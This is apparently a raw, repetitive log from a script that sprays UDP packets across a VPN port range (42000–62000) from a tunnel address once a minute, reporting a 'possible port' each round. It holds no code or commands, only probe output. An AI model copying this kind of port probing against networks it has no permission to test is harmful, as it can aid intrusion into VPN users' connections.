-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:39:05 -Starting port fill at 2020-09-06 10:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:40:06 -Starting port fill at 2020-09-06 10:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:41:06 -Starting port fill at 2020-09-06 10:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:42:06 -Starting port fill at 2020-09-06 10:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:43:06 -Starting port fill at 2020-09-06 10:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:44:07 -Starting port fill at 2020-09-06 10:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:45:05 -Starting port fill at 2020-09-06 10:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:46:05 -Starting port fill at 2020-09-06 10:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:47:05 -Starting port fill at 2020-09-06 10:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:48:07 -Starting port fill at 2020-09-06 10:49:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:49:05 -Starting port fill at 2020-09-06 10:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:50:04 -Starting port fill at 2020-09-06 10:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:51:04 -Starting port fill at 2020-09-06 10:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:52:04 -Starting port fill at 2020-09-06 10:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:53:04 -Starting port fill at 2020-09-06 10:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:54:06 -Starting port fill at 2020-09-06 10:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:55:06 -Starting port fill at 2020-09-06 10:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:56:04 -Starting port fill at 2020-09-06 10:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:57:06 -Starting port fill at 2020-09-06 10:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:58:05 -Starting port fill at 2020-09-06 10:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:59:04 -Starting port fill at 2020-09-06 11:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:00:04 -Starting port fill at 2020-09-06 11:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:01:07 -Starting port fill at 2020-09-06 11:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:02:05 -Starting port fill at 2020-09-06 11:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:03:07 -Starting port fill at 2020-09-06 11:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 